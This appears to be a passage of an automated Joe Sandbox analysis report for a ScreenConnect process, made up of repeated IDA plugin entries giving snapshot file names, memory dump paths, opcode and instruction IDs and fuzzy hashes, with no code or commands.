                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 43dede53b78ae73a6c805c0aa2bd58226175073e981b4908b7c17af446e5e846
                                                                                                                                                                                                                                                        • Instruction ID: c99f542079fc889a71dcfe81b0b813a04569d283db52d74c6c99f48d089ec50b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43dede53b78ae73a6c805c0aa2bd58226175073e981b4908b7c17af446e5e846
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14513D34B003058FCB14EF68D99496EB7EAEFD83147148569E54ACF365EB70EC068BA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 96f561c3fbf326327862574c0528ff427b5c0e22de0a50ef4d92f4c525c07f6c
                                                                                                                                                                                                                                                        • Instruction ID: 23a005ac3c1c31b44575527af8235556a124e12811f59412a65043c7a6edfeb0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96f561c3fbf326327862574c0528ff427b5c0e22de0a50ef4d92f4c525c07f6c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94510830600B018FC725CF29E884A66B7F6FF89324B244A5DD49ADB7A4DB31E806DB50
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 06ed76cc0a2d4591d88d7e058e3674343ad89078743a3579be83c936f02ee540
                                                                                                                                                                                                                                                        • Instruction ID: 7ea80727e3a6fa996f47ceb8b9b11b4527ddb9488211e1314398dd9db1dcb528
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06ed76cc0a2d4591d88d7e058e3674343ad89078743a3579be83c936f02ee540
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D518C34E503099FDB05DFB8D844B9DBBB5FF88300F108569E404AB3A5EB74A989CB61
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d920b5d266b8e40e9b6983db57f70c41c95be3ce7e1a2ab2ed184f60ecf3af69
                                                                                                                                                                                                                                                        • Instruction ID: 1f3639149ffccd96d36beb3d9f6049c7611075cae34790cd5974981ae3f88719
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d920b5d266b8e40e9b6983db57f70c41c95be3ce7e1a2ab2ed184f60ecf3af69
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08411231E002199BDB15DFA5C890BEEBBB5EF85704F14812AE405B7385DB70AD46CBA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 110618595d16f927d17b3fb51d003ff868a7212ca75e8f5a273d13e9782a959b
                                                                                                                                                                                                                                                        • Instruction ID: bf26161a3f958c01f5d3e4080183d788986be539fe5ebf2661612d679f9cf2f6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 110618595d16f927d17b3fb51d003ff868a7212ca75e8f5a273d13e9782a959b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53514B74E503099FDB04DFA4E944B9DBBB5FF88300F208569E404AB365DB74A985CF50
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f36b34c06aaeb30e7fe8f6b953cbac1220ad4bfa6d37be679bf55efca828178d
                                                                                                                                                                                                                                                        • Instruction ID: dc404cb5a3c634c85677c7f998ab6756bf63889371d721d5a2997ebf8b6d97b2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f36b34c06aaeb30e7fe8f6b953cbac1220ad4bfa6d37be679bf55efca828178d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9418A31B102148FCB14DB79E854AADBBF6EF88710B144569E806EB3A1DF759D05CBA0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fc211dda4d9666c75d0a6596036613e49b0aa141f95a481a799bb1d70a97e633
                                                                                                                                                                                                                                                        • Instruction ID: f377ee539ac491c64de0e3e7d8c695ae7a675be3fd2720515cfecd0264f16dba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc211dda4d9666c75d0a6596036613e49b0aa141f95a481a799bb1d70a97e633
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE31DF75B102594F8716EB7CA89196EB7AAEFC5340300897AD809DB384EF70DD098BE1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3284462676.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c5d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c5e51f2e97ca263d5cc53305b058f58c30b0388e86a330fd202886afb06373bd
                                                                                                                                                                                                                                                        • Instruction ID: 2f473a0ed68d52f1dd124a47ced0455b11c9b1a5b680627f83d76f7c5e3c4fcb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5e51f2e97ca263d5cc53305b058f58c30b0388e86a330fd202886afb06373bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F21CFB5A10211DFCB04AF78D94856EBBB1FF883157188166D81AD7391EB30DD01CBB2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6a504d7d6e178e4bce62424ae2ad6a263bf12d6c0eafd6c1bddb265a1cccc40c
                                                                                                                                                                                                                                                        • Instruction ID: 6bf3a59e38acb8140edd581f62206004534f7ef530579df1c2d4f44238a7eb7a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a504d7d6e178e4bce62424ae2ad6a263bf12d6c0eafd6c1bddb265a1cccc40c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D321FDB4A10315DFCB00AF74D94856EBBB5FB49311B148166D82AD7391EB30ED01CBB2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e5befd1d614a3620bd6d92f44b1c8aa4bf2c5cdb076c66a661141dd79ce00fc6
                                                                                                                                                                                                                                                        • Instruction ID: 7852741f3987b90ad459c9f4cc3ae19f1476ffb44462f47aee51af366052eac2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5befd1d614a3620bd6d92f44b1c8aa4bf2c5cdb076c66a661141dd79ce00fc6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2213E306007059FC735CF25D848A96BBF5EF84320B248A2ED497977A1DB31E94ADFA0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c57871b60f7f11881bfd4f2a2d51cca1bbcbe5f669ab3753036dcd8ecbeb61a8
                                                                                                                                                                                                                                                        • Instruction ID: 800b69a0ff4ea501751567a46edb275b89da5b82dc5dbafea5d60df7a45bd551
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c57871b60f7f11881bfd4f2a2d51cca1bbcbe5f669ab3753036dcd8ecbeb61a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D811CD307002485BC705EB78D981BAEBBA6EFC0341F048529E805EB399DF70AE09CB95
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 605684e162109f57fe08c7188433234f21afbfe140cf3706b84f92aa7bbd5723
                                                                                                                                                                                                                                                        • Instruction ID: e4c98416c0ef52d698ede2600eb3142579c0a963789ecd90a5e25e74df00edde
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 605684e162109f57fe08c7188433234f21afbfe140cf3706b84f92aa7bbd5723
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B62134B6C002499FCB10CF9AD844ADEBBF5FF88310F14852AE919A7310C379A955DFA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9b41cafc90895535b8cddea0cf42a9959f8cc8a7a5f276e80419704106f33bee
                                                                                                                                                                                                                                                        • Instruction ID: 6f09c7c41dcd63c38d32e1a06d1b0b570dad6a9427c21de0bc39013bfde44383
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b41cafc90895535b8cddea0cf42a9959f8cc8a7a5f276e80419704106f33bee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E81106302083909FD706DB29D451DA67FB1DF8731075A80DBE885CF2A6CA35DC42C721
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bcffb38982b3a1a303a69928604dd2a5928af036831fd931669d36830a3ae50b
                                                                                                                                                                                                                                                        • Instruction ID: 226626315711f2706a2269ca7b378ef33001afbdbf091a811090e56ab732de98
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcffb38982b3a1a303a69928604dd2a5928af036831fd931669d36830a3ae50b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB21C970A007058FC724DF6DD944A6ABBF5EF48310B14CA2ED8A6D77A4D730E906DB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 34aac84ff0796f587450dc7e7b2d65f5d5edc2f88b81ced615ef8f685196f0ca
                                                                                                                                                                                                                                                        • Instruction ID: 5f8ee42147788e1739df0b5075b7d41850c6470f8c5e58ab5aea190b5a0196b5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34aac84ff0796f587450dc7e7b2d65f5d5edc2f88b81ced615ef8f685196f0ca
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6711D0757002485BC705EB68D981BAEBBA7EFC5341F008529E805EB399DF70AE09C7E5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3284462676.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 694cc0495dc192c17eb82f57a92c249902c32760a6dd8cbc4ae9d4d761f11331
                                                                                                                                                                                                                                                        • Instruction ID: cd5d7c86c8beb7a4a3506d50414fb3e138ed88ddc7b4035fdf3afa5e2b381ccf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 694cc0495dc192c17eb82f57a92c249902c32760a6dd8cbc4ae9d4d761f11331
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18110D31E502198FCF14DBA8D961AEDBBB5AF49310F00146AD106BB374DA741D45CBA0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 021c5da5be357e019191b88f22276cc5c591156742bcfcf64331076789dbecd4
                                                                                                                                                                                                                                                        • Instruction ID: ca5fe2efd65de794c9276e7b25100c79c15e76a40f902ce9f389bfad20027ff1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 021c5da5be357e019191b88f22276cc5c591156742bcfcf64331076789dbecd4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95115B3194014EDFCB06DFA8D9909ECBBB2EF84304B59C556E045AB225DB31ED4AEB70
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3a9a506fc4aa19c7d01209f9dbc9709abc8cf9ebe8aa5f121237ebc64da26705
                                                                                                                                                                                                                                                        • Instruction ID: 04ab5bf52fef9b82ef3622bb1433f42319437e1964a25351b5544c916fd1014a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a9a506fc4aa19c7d01209f9dbc9709abc8cf9ebe8aa5f121237ebc64da26705
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1711A171E40204AFDB24CA68D850AEEBBB6AFC4300F58C566D554E7254D7729A02CB94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: af05532514f0ec80bb5cf3589f12a7507a5c6c18f9e93d6bab556cfc6d68bc8f
                                                                                                                                                                                                                                                        • Instruction ID: 50352364ff2bcc43c74a0e77e3c94afc40ab994a8e39601044d988b9dda465d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af05532514f0ec80bb5cf3589f12a7507a5c6c18f9e93d6bab556cfc6d68bc8f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D018474B540158FC705DB59D45497EFBB6EFC8310B24816AD90ADB355EB31EC02C7A1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ded4c754472a176c2ab3af9ccfb3291e1c5368fe871417eaf3422b640f21620d
                                                                                                                                                                                                                                                        • Instruction ID: 4703b36e7ea4b2decd179d2c163f251676aacdb0f9732887b2ca421c50761e57
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded4c754472a176c2ab3af9ccfb3291e1c5368fe871417eaf3422b640f21620d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D011A030E142599FDF15EBA8D960AEDBFB1AF4A300F04046AD106BB3A4DB381C04CBA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e87e8122e8e3436e956e24aab6c0f3d39b3db91f055449ddb9bd26230cb5352e
                                                                                                                                                                                                                                                        • Instruction ID: 019582d36d38a0bf4eebcb4db6fac7e866d0d3857dc85aff2768124e2a35f18e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e87e8122e8e3436e956e24aab6c0f3d39b3db91f055449ddb9bd26230cb5352e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C311303690020A9FCF01DFA8C9409DEBBF5FF49304B10856AE504FB261D772AA0ACB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 536481f28b6df669f765fffaaca62e1f545f9b31f323474e66336a66c7a149e1
                                                                                                                                                                                                                                                        • Instruction ID: 3db6d9a709ad73da03f2d4d33deec3ccff0aa5ece752c8888178245d483da142
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 536481f28b6df669f765fffaaca62e1f545f9b31f323474e66336a66c7a149e1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB11213590010A9FCB01DFA8D9409DEBBB1FF49354B10856AD904FB261D771AA0ACB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9e567c4e78a346c0b209067f96019712c7d759f081086b4747b87269d229354c
                                                                                                                                                                                                                                                        • Instruction ID: 14f50842b9854613d29c95f6827596fbbdfa8627a4adee967a4a60e87897fd3b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e567c4e78a346c0b209067f96019712c7d759f081086b4747b87269d229354c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9017B319083986FC709ABBC98654AD7FE4EE8A300F0408EBC0C5CB352DD38D406C765
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3284462676.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c5d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
